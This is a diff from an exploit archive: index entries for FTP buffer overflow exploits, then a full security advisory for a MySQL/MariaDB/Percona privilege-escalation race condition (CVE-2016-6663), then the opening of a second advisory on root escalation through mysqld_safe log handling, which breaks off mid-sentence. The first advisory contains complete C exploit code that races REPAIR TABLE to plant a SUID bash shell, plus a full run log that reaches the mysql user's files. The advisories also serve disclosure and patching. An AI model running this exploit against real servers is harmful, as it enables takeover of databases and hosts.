 40670,platforms/windows/remote/40670.py,"PCMAN FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote,0
+40674,platforms/windows/remote/40674.py,"Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow",2016-11-01,Ger,windows,remote,0
+40671,platforms/php/webapps/40671.txt,"School Registration and Fee System - Authentication Bypass",2016-11-01,opt1lc,php,webapps,0
+40672,platforms/windows/remote/40672.py,"Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow",2016-11-01,Karri93,windows,remote,0
+40673,platforms/windows/remote/40673.py,"Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow",2016-11-01,Cybernetic,windows,remote,0
+40675,platforms/windows/remote/40675.py,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)",2016-11-01,n30m1nd,windows,remote,0
+40677,platforms/windows/remote/40677.py,"Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow",2016-11-01,Eagleblack,windows,remote,0
+40678,platforms/linux/local/40678.txt,"MySQL / MariaDB / PerconaDB - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
+40679,platforms/linux/local/40679.txt,"MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0

platforms/linux/local/40678.txt

@@ -0,0 +1,765 @@
+=============================================
+- Release date: 01.11.2016
+- Discovered by: Dawid Golunski
+- Severity: Critical
+- CVE-2016-6663 / OCVE-2016-5616
+- http://legalhackers.com
+=============================================
+
+
+I. VULNERABILITY
+-------------------------
+
+MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition
+
+
+MariaDB 
+	< 5.5.52
+	< 10.1.18
+        < 10.0.28
+
+MySQL  
+	<= 5.5.51
+	<= 5.6.32
+	<= 5.7.14
+
+Percona Server
+	< 5.5.51-38.2
+	< 5.6.32-78-1
+	< 5.7.14-8
+
+Percona XtraDB Cluster
+	< 5.6.32-25.17
+	< 5.7.14-26.17
+	< 5.5.41-37.0
+
+
+II. BACKGROUND
+-------------------------
+
+
+MySQL:
+
+"MySQL is the world's most popular open source database.
+Whether you are a fast growing web property, technology ISV or large
+enterprise, MySQL can cost-effectively help you deliver high performance,
+scalable database applications."
+
+"Many of the world's largest and fastest-growing organizations including
+Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time
+and money powering their high-volume Web sites, business-critical systems and
+packaged software."
+
+http://www.mysql.com/products/
+http://www.mysql.com/why-mysql/
+
+--
+
+MariaDB:
+
+"MariaDB is one of the most popular database servers in the world. 
+It’s made by the original developers of MySQL and guaranteed to stay open source. 
+Notable users include Wikipedia, WordPress.com and Google.
+
+MariaDB turns data into structured information in a wide array of applications, 
+ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. 
+MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of 
+storage engines, plugins and many other tools make it very versatile for a wide 
+variety of use cases."
+
+https://mariadb.org/about/
+
+--
+
+PerconaDB:
+
+"Percona Server for MySQL® is a free, fully compatible, enhanced, open source 
+drop-in replacement for MySQL that provides superior performance, scalability 
+and instrumentation. 
+With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support
+for extremely high-performance hardware delivers excellent performance and reliability."
+
+https://www.percona.com/software/mysql-database/percona-server
+
+
+III. INTRODUCTION
+-------------------------
+
+An independent research has revealed a race condition vulnerability which is 
+present in MySQl, MariaDB and PerconaDB databases. 
+
+The vulnerability can allow a local system user with access to the affected 
+database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) 
+to escalate their privileges and execute arbitrary code as the database system 
+user (typically 'mysql'). 
+
+Successful exploitation would allow an attacker to gain access to all of the 
+databases stored on the affected database server.
+
+The obtained level of access upon the exploitation, could be chained with
+the other privilege escalation vulnerabilities discovered by the author of
+this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges 
+from mysql user to root user and thus allow attackers to fully compromise the 
+target server.
+
+
+IV. DESCRIPTION
+-------------------------
+
+
+Table locations
+~~~~~~~~~~~~~~~~~~
+
+MySQL-based databases allow users with CREATE table privilege to optionally
+specify a disk path of the directory where the table will be stored via a DATA 
+DIRECTORY parameter in the CREATE statement.
+
+Users who have access to a database account with CREATE grant could create a 
+table under a directory that they can control. For example:
+
+attacker@debian:~$ mkdir /tmp/disktable
+attacker@debian:~$ chmod 777 /tmp/disktable/
+attacker@debian:~$ ls -ld /tmp/disktable/
+drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/
+
+A user could then place a table within the directory with the following SQL 
+statement:
+
+mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';
+
+which would result in creating the following table file:
+
+attacker@debian:~$ ls -l /tmp/disktable/
+total 0
+-rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD
+
+
+Race Condition
+~~~~~~~~~~~~~~~~~~
+
+Observing file operations performed on the table stored within the directory, 
+it was discovered that REPAIR TABLE SQL statement which is available to 
+low-privileged users with SELECT/CREATE/INSERT grants, performed unsafe 
+operations on temporary files created during the table repair process.
+
+Executing the statement:
+
+mysql> REPAIR TABLE `poctab1`;
++----------------+--------+----------+----------+
+| Table          | Op     | Msg_type | Msg_text |
++----------------+--------+----------+----------+
+| testdb.poctab1 | repair | status   | OK       |
++----------------+--------+----------+----------+
+
+would result in execution of the following system calls:
+
+[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
+[pid  1463] open("/tmp/disktable/poctab1.MYD", O_RDWR) = 65
+[pid  1463] access("./testdb/poctab1.TRG", F_OK) = -1 ENOENT (No such file or directory)
+[pid  1463] lseek(65, 0, SEEK_CUR)      = 0
+[pid  1463] lseek(65, 0, SEEK_END)      = 0
+[pid  1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0
+[pid  1463] open("/tmp/disktable/poctab1.TMD", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66
+[pid  1463] lseek(65, 0, SEEK_END)      = 0
+[pid  1463] lseek(64, 0, SEEK_END)      = 1024
+[pid  1463] close(65)                   = 0
+[pid  1463] close(66)                   = 0
+[pid  1463] lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
+[pid  1463] lstat("/tmp/disktable", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0
+[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
+[pid  1463] stat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
+[pid  1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0
+[pid  1463] chown("/tmp/disktable/poctab1.TMD", 110, 115) = 0
+[pid  1463] unlink("/tmp/disktable/poctab1.MYD") = 0
+[pid  1463] rename("/tmp/disktable/poctab1.TMD", "/tmp/disktable/poctab1.MYD") = 0
+
+
+The first call:
+
+[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
+
+was found to check file permissions of poctab1.MYD table which are then copied with chmod()
+to the newly created poctab1.TMD temporary file containing the repaired table.
+
+The code is vulnerable to Race Condition between the call:
+
+[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
+
+and
+
+[pid  1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0
+
+
+If an attacker managed to unlink the temporary table poctab1.TMD and replace it
+with a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), 
+they would be able to apply arbitrary permissions on the data directory. 
+The attacker would be able to control the set of permissions by pre-setting them on
+poctab1.MYD file before executing the REPAIR TABLE statement.
+For example, by setting the permissions of poctab1.MYD to 777 the data directory
+would become readable and writable to the attacker.
+
+
+Obtaining mysql-suid shell
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Apart from gaining access to arbitrary mysql files, the attacker could also 
+achieve arbitrary code execution in the context of mysql user (mysql shell).
+
+This could be done by first pre-setting permissions on poctab1.MYD to 04777 
+(suid), and winning the race so that the permissions get applied on a copy
+of a bash shell file through the vulnerable chmod() call effectively creating
+a shell that elevates their permissions after execution.
+
+There is only one problem. Their suid shell would remain to be owned by the 
+attacker's user id and not 'mysql' user. 
+
+To elevate their privileges, attacker would need to copy the bash shell to a 
+mysql-owned table file which are owned by mysql user.  However mysql table 
+files are not writable by other users making it impossible for attacker to save 
+the shell.
+
+This could be bypassed if attacker created a specially crafted directory 
+with a group sticky bit and then created a second table named 'poctab2' as
+follows:
+
+attacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/
+attacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/
+drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/
+
+mysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';
+Query OK, 0 rows affected (0.00 sec)
+
+attacker@debian:/tmp/disktable$ ls -l /tmp/disktable/
+total 0
+-rw-rw---- 1 mysql mysql    0 Oct 28 11:04 poctab1.MYD
+-rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD
+
+As we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions
+of the group on disktable directory)  has 'mysql' as the owner but 'attacker' 
+as the group. 
+Therefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file 
+and preserve the file owner.
+
+Finally, they could exploit the Race Condition again and have SUID + exec 
+permissions applied on poctab2.MYD which would then allow them to execute the suid 
+shell with elevated privileges of the mysql user.
+
+
+From mysql to root
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+After obtaining a mysql suid shell, attackers could then exploit one of the 
+other MySQL vulnerabilities discovered by the author of this advisory:
+
+CVE-2016-6662 
+or
+CVE-2016-6664 (OCVE-2016-5617)
+
+to escalate their privileges from mysql user to root system user.
+
+
+
+
+V. PROOF OF CONCEPT EXPLOIT
+-------------------------
+
+
+------------------[ mysql-privesc-race.c ]--------------------
+
+/*
+
+MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
+mysql-privesc-race.c (ver. 1.0)
+
+CVE-2016-6663 / OCVE-2016-5616
+
+Discovered/Coded by:
+
+Dawid Golunski
+
+dawid[at]legalhackers.com
+@dawid_golunski
+http://legalhackers.com
+
+
+Compile:
+gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
+
+Note:
+* On RedHat-based systems you might need to change /tmp to another public directory
+
+* For testing purposes only. Do no harm.  
+
+Full advisory URL:
+http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
+
+*/
+
+
+#include <fcntl.h>
+#include <grp.h>
+#include <mysql.h>
+#include <pwd.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/inotify.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <time.h>
+#include <unistd.h>
+
+
+#define EXP_PATH          "/tmp/mysql_privesc_exploit"
+#define EXP_DIRN          "mysql_privesc_exploit"
+#define MYSQL_TAB_FILE    EXP_PATH "/exploit_table.MYD"
+#define MYSQL_TEMP_FILE   EXP_PATH "/exploit_table.TMD"
+
+#define SUID_SHELL   	  EXP_PATH "/mysql_suid_shell.MYD"
+
+#define MAX_DELAY 1000    // can be used in the race to adjust the timing if necessary
+
+MYSQL *conn;		  // DB handles
+MYSQL_RES *res;
+MYSQL_ROW row;
+
+unsigned long cnt;
+
+
+void intro() {
+
+printf( 
+        "\033[94m\n"
+        "MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n"
+        "mysql-privesc-race.c (ver. 1.0)\n\n"
+        "CVE-2016-6663 / OCVE-2016-5616\n\n"
+        "For testing purposes only. Do no harm.\n\n"
+	"Discovered/Coded by:\n\n"
+	"Dawid Golunski \n"
+	"http://legalhackers.com"
+        "\033[0m\n\n");
+
+}
+
+void usage(char *argv0) {
+    intro();
+    printf("Usage:\n\n%s user pass db_host database\n\n", argv0);
+}
+
+void mysql_cmd(char *sql_cmd, int silent) {
+    
+    if (!silent) {
+	    printf("%s \n", sql_cmd);
+    }
+    if (mysql_query(conn, sql_cmd)) {
+        fprintf(stderr, "%s\n", mysql_error(conn));
+        exit(1);
+    }
+    res = mysql_store_result(conn);
+    if (res>0) mysql_free_result(res);
+
+}
+
+
+int main(int argc,char **argv)
+{
+
+    int randomnum = 0;
+    int io_notified = 0;
+    int myd_handle;
+    int wpid;
+    int is_shell_suid=0;
+    pid_t pid;
+    int status;
+    struct stat st;
+    /* io notify */
+    int fd;
+    int ret;
+    char buf[4096] __attribute__((aligned(8)));
+    int num_read;
+    struct inotify_event *event;
+    /* credentials */
+    char *user     = argv[1];
+    char *password = argv[2];
+    char *db_host  = argv[3];
+    char *database = argv[4];
+
+
+    // Disable buffering of stdout
+    setvbuf(stdout, NULL, _IONBF, 0);
+
+    // Get the params
+    if (argc!=5) {
+	usage(argv[0]);
+	exit(1);
+    } 
+    intro();
+    // Show initial privileges
+    printf("\n[+] Starting the exploit as: \n");
+    system("id");
+
+    // Connect to the database server with provided credentials
+    printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host);
+    conn = mysql_init(NULL);
+    if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {
+        fprintf(stderr, "%s\n", mysql_error(conn));
+        exit(1);
+    }
+
+    // Prepare tmp dir
+    printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN);
+    umask(000);
+    system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN);
+    system("chmod g+s /tmp/" EXP_DIRN );
+
+    // Prepare exploit tables :)
+    printf("\n[+] Creating mysql tables \n\n");
+    mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0);
+    mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0);
+    mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
+    mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
+
+    // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file
+    // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory
+    printf("\n[+] Copying bash into the mysql_suid_shell table.\n    After the exploitation the following file/table will be assigned SUID and executable bits : \n");
+    system("cp /bin/bash " SUID_SHELL);
+    system("ls -l " SUID_SHELL);
+
+    // Use inotify to get the timing right
+    fd = inotify_init();
+    if (fd < 0) {
+        printf("failed to inotify_init\n");
+        return -1;
+    }
+    ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);
+
+
+    /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */
+
+    printf("\n[+] Entering the race loop... Hang in there...\n");
+
+    while ( is_shell_suid != 1 ) {
+
+        cnt++;
+	if ( (cnt % 100) == 0 ) {
+	 	printf("->");
+	 	//fflush(stdout);	
+	}
+
+        /* Create empty file , remove if already exists */
+        unlink(MYSQL_TEMP_FILE);
+        unlink(MYSQL_TAB_FILE);
+   	mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1);
+	mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1);
+
+	/* random num if needed */
+        srand ( time(NULL) );
+        randomnum = ( rand() % MAX_DELAY );
+
+        // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink
+        pid = fork();
+        if (pid < 0) {
+            fprintf(stderr, "Fork failed :(\n");
+        }
+
+        /* Child process - executes REPAIR TABLE  SQL statement */
+        if (pid == 0) {
+            usleep(500);
+            unlink(MYSQL_TEMP_FILE);
+	    mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1);
+            // child stops here
+            exit(0);
+        }
+
+        /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */
+        if (pid > 0 ) {
+            io_notified = 0;
+
+            while (1) {
+                int processed = 0;
+                ret = read(fd, buf, sizeof(buf));
+                if (ret < 0) {
+                    break;
+                }
+                while (processed < ret) {
+                    event = (struct inotify_event *)(buf + processed);
+                    if (event->mask & IN_CLOSE) {
+                        if (!strcmp(event->name, "exploit_table.TMD")) {
+                            //usleep(randomnum);
+
+			    // Set the .MYD permissions to suid+exec before they get copied to the .TMD file 
+			    unlink(MYSQL_TAB_FILE);
+			    myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);
+			    close(myd_handle);
+			    chmod(MYSQL_TAB_FILE, 04777);
+
+			    // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec
+                            unlink(MYSQL_TEMP_FILE);
+                            symlink(SUID_SHELL, MYSQL_TEMP_FILE);
+                            io_notified=1;
+                        }
+                    }
+                    processed += sizeof(struct inotify_event);
+                }
+                if (io_notified) {
+                    break;
+                }
+            }
+
+
+            waitpid(pid, &status, 0);
+        }
+
+	// Check if SUID bit was set at the end of this attempt
+        if ( lstat(SUID_SHELL, &st) == 0 ) {
+	    if (st.st_mode & S_ISUID) {
+		is_shell_suid = 1;
+	    }
+        } 
+
+    }
+
+    printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt);
+    system("ls -l " SUID_SHELL);
+
+    printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n    Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
+    system(SUID_SHELL " -p -i ");
+    //system(SUID_SHELL " -p -c '/bin/bash -i -p'");
+
+    /* close MySQL connection and exit */
+    printf("\n[+] Job done. Exiting\n\n");
+    mysql_close(conn);
+    return 0;
+
+}
+
+
+------------------[ EOF ]--------------------
+
+
+
+Example run:
+~~~~~~~~~~~~~~
+
+attacker@xenial:~/mysql-exploit$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu 16.04.1 LTS
+Release:	16.04
+Codename:	xenial
+
+attacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv
+ii  mariadb-server                     10.0.27-0ubuntu0.16.04.1          all          MariaDB database server (metapackage depending on the latest version)
+ii  mariadb-server-10.0                10.0.27-0ubuntu0.16.04.1          amd64        MariaDB database server binaries
+ii  mariadb-server-core-10.0           10.0.27-0ubuntu0.16.04.1          amd64        MariaDB database core server files
+
+attacker@xenial:~/mysql-exploit$ id
+uid=1001(attacker) gid=1001(attacker) groups=1001(attacker)
+
+attacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;'
++-----------------------------------------------------------------------------------------------------------------+
+| Grants for attacker@localhost                                                                                   |
++-----------------------------------------------------------------------------------------------------------------+
+| GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' |
+| GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost'                                       |
++-----------------------------------------------------------------------------------------------------------------+
+
+attacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.*
+ls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied
+
+attacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb
+
+MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
+mysql-privesc-race.c (ver. 1.0)
+
+CVE-2016-6663 / OCVE-2016-5616
+
+For testing purposes only. Do no harm.
+
+Discovered/Coded by:
+
+Dawid Golunski 
+http://legalhackers.com
+
+
+[+] Starting the exploit as: 
+uid=1001(attacker) gid=1001(attacker) groups=1001(attacker)
+
+[+] Connecting to the database `pocdb` as attacker@localhost
+
+[+] Creating exploit temp directory /tmp/mysql_privesc_exploit
+
+[+] Creating mysql tables 
+
+DROP TABLE IF EXISTS exploit_table 
+DROP TABLE IF EXISTS mysql_suid_shell 
+CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 
+CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 
+
+[+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : 
+-rw-rw---- 1 mysql attacker 1037528 Nov  1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
+
+[+] Entering the race loop... Hang in there...
+
+
+[+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: 
+
+-rwsrwxrwx 1 mysql attacker 1037528 Nov  1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
+
+[+] Spawning the mysql SUID shell now... 
+    Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)
+
+mysql_suid_shell.MYD-4.3$ whoami
+mysql
+mysql_suid_shell.MYD-4.3$ id
+uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)
+mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.*
+-rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm
+-rw-rw---- 1 mysql mysql  168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD
+-rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI
+mysql_suid_shell.MYD-4.3$ exit
+exit
+
+[+] Job done. Exiting
+
+
+real	0m28.999s
+user	0m0.016s
+sys	0m0.016s
+
+
+
+
+Video PoC:
+~~~~~~~~~~~~
+http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
+
+
+
+VI. BUSINESS IMPACT
+-------------------------
+
+Malicious local users with DB access granted a common set of privileges 
+(SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary 
+code and escalate their privileges to mysql system user. This would allow them 
+to gain access to all of the databases stored on the server as well as exploit 
+CVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges
+to root system user (rootshell) and fully compromise the target server.
+
+This vulnerability could for example be exploited by malicious users in a shared 
+hosting environment where each user is supposed to have access to only one 
+database assigned to them. 
+It could also be exploited by attackers who have managed to find a vulnerability
+in a website and gained access to the target system as a low-privileged user
+(such as apache/www-data).
+
+ 
+VII. SYSTEMS AFFECTED
+-------------------------
+
+MariaDB 
+	< 5.5.52
+	< 10.1.18
+        < 10.0.28
+
+MySQL  
+	<= 5.5.51
+	<= 5.6.32
+	<= 5.7.14
+
+Percona Server
+	< 5.5.51-38.2
+	< 5.6.32-78-1
+	< 5.7.14-8
+
+Percona XtraDB Cluster
+	< 5.6.32-25.17
+	< 5.7.14-26.17
+	< 5.5.41-37.0
+
+
+
+When checking if your system contains the patches, note that this vulnerability 
+has been known under two CVE IDs: 
+
+CVE-2016-6663
+CVE-2016-5616
+
+CVE-2016-6663 is the original CVE that was agreed to be used by all the
+affected vendors. 
+The issue was however mentioned in Oracle CPU mistakenly under a new CVE of
+CVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be 
+updated to state that CVE-2016-5616 is equivalent to CVE-2016-6663.
+
+ 
+VIII. SOLUTION
+-------------------------
+
+MariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in
+advance which allowed them to produce patches for this vulnerability before
+disclosure.
+
+Update to security releases issued by the vendor.
+
+As a temporary mitigation, you can disable symbolic link support in the
+database server configuration with the following my.cnf config setting:
+
+symbolic-links = 0
+
+Nevertheless, an update to a patched release is recommended.
+
+ 
+IX. REFERENCES
+-------------------------
+
+http://legalhackers.com
+
+This advisory (CVE-2016-6663 / OCVE-2016-5616):
+http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
+
+Exploit (mysql-privesc-race.c) source code URL:
+http://legalhackers.com/exploits/mysql-privesc-race.c
+
+Video PoC:
+http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
+
+Advisory for CVE-2016-6664 / OCVE-2016-5617:
+http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
+
+
+Vendor updates:
+
+http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL
+http://www.mysql.com/
+
+https://mariadb.org/about/
+https://mariadb.com/kb/en/mdb-5552-rn/
+https://mariadb.com/kb/en/mdb-10118-rn/
+https://mariadb.com/kb/en/mdb-10028-rn/
+
+https://www.percona.com/software
+
+
+X. CREDITS
+-------------------------
+
+The vulnerability has been discovered by Dawid Golunski
+dawid (at) legalhackers (dot) com
+
+http://legalhackers.com
+ 
+
+XI. REVISION HISTORY
+-------------------------
+
+01.11.2016 - Advisory released
+
+ 
+XII. LEGAL NOTICES
+-------------------------
+
+The information contained within this advisory is supplied "as-is" with
+no warranties or guarantees of fitness of use or otherwise. I accept no
+responsibility for any damage caused by the use or misuse of this information.

platforms/linux/local/40679.txt

@@ -0,0 +1,531 @@
+=============================================
+- Release date: 01.11.2016
+- Discovered by: Dawid Golunski
+- Severity: High
+- CVE-2016-6664 / OCVE-2016-5617
+- http://legalhackers.com
+=============================================
+
+
+I. VULNERABILITY
+-------------------------
+
+MariaDB / MySQL / PerconaDB   -   Root Privilege Escalation
+
+MySQL  
+	<= 5.5.51
+	<= 5.6.32
+	<= 5.7.14
+
+MariaDB
+	All current
+
+Percona Server
+	< 5.5.51-38.2
+	< 5.6.32-78-1
+	< 5.7.14-8
+
+Percona XtraDB Cluster
+	< 5.6.32-25.17
+	< 5.7.14-26.17
+	< 5.5.41-37.0
+
+
+II. BACKGROUND
+-------------------------
+
+MySQL:
+
+"MySQL is the world's most popular open source database.
+Whether you are a fast growing web property, technology ISV or large
+enterprise, MySQL can cost-effectively help you deliver high performance,
+scalable database applications."
+
+"Many of the world's largest and fastest-growing organizations including
+Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time
+and money powering their high-volume Web sites, business-critical systems and
+packaged software."
+
+http://www.mysql.com/products/
+http://www.mysql.com/why-mysql/
+
+--
+
+MariaDB:
+
+"MariaDB is one of the most popular database servers in the world. 
+It’s made by the original developers of MySQL and guaranteed to stay open source. 
+Notable users include Wikipedia, WordPress.com and Google.
+
+MariaDB turns data into structured information in a wide array of applications, 
+ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. 
+MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of 
+storage engines, plugins and many other tools make it very versatile for a wide 
+variety of use cases."
+
+https://mariadb.org/about/
+
+--
+
+PerconaDB:
+
+"Percona Server for MySQL is a free, fully compatible, enhanced, open source 
+drop-in replacement for MySQL that provides superior performance, scalability 
+and instrumentation. 
+With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support
+for extremely high-performance hardware delivers excellent performance and reliability."
+
+https://www.percona.com/software/mysql-database/percona-server
+
+
+III. INTRODUCTION
+-------------------------
+
+MySQL-based databases including MySQL, MariaDB and PerconaDB are affected
+by a privilege escalation vulnerability which can let attackers who have
+gained access to mysql system user to further escalate their privileges
+to root user allowing them to fully compromise the system.
+The vulnerability stems from unsafe file handling of error logs and
+other files.
+
+
+IV. DESCRIPTION
+-------------------------
+
+The error.log file on most default installations of MySQL/PerconaDB/MariaDB
+databases is stored either in /var/log/mysql or /var/lib/mysql directory.
+
+The permissions on the file and directory look as follows:
+
+root@trusty:/var/lib/mysql# ls -la /var/log/mysql
+total 468
+drwxr-s---  2 mysql adm      4096 Sep 11 06:25 .
+drwxrwxr-x 36 root  syslog   4096 Sep 11 06:25 ..
+-rw-r-----  1 mysql adm         0 Sep 11 06:25 error.log
+
+root@trusty:/var/lib/mysql# ls -lad /var/log/mysql
+drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql
+
+
+mysqld_safe wrapper that is normally used for starting MySQL daemon and 
+creating/reopening the error.log performs certain unsafe file operations that
+may allow attackers to gain root privileges.
+
+The wrapper script contains a 'while' loop shown below which monitors the mysqld 
+process and performs a restart in case of the process failure.  
+The restart involves re-creation of the error.log file if syslog logging has
+not been configured instead of error log files (file-based logging is the 
+default setting on most installations).
+
+
+--------[ mysqld_safe ]--------
+[...]
+
+while true
+do
+  rm -f "$pid_file"     # Some extra safety
+
+  start_time=`date +%M%S`
+
+  eval_log_error "$cmd"
+
+  if [ $want_syslog -eq 0 -a ! -f "$err_log" ]; then
+    touch "$err_log"                    # hypothetical: log was renamed but not
+    chown $user "$err_log"              # flushed yet. we'd recreate it with
+    chmod "$fmode" "$err_log"           # wrong owner next time we log, so set
+  fi                                    # it up correctly while we can!
+
+[...]
+
+-------------------------------
+
+As can be seen, the error.log file is created (touch) and chowned to the user
+running the mysqld daemon (typically 'mysql'). 
+
+The operation is vulnerable to a symlink attack.
+
+Attackers who obtained access to mysql account for example through CVE-2016-6663
+vulnerability described at:
+
+http://legalhackers.com/advisories/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-OCVE-2016-5616-Exploit.html
+
+would gain access to /var/log or /var/lib/mysql directories (owned by mysql user) 
+and could therefore easily remove the error.log file and replace it 
+with a symlink to an arbitrary system file which would result in creating in
+arbitrary file on the system with mysql privileges and could be used to escalate
+privileges.
+
+The privilege escalation could be triggered instantly (without the need to wait
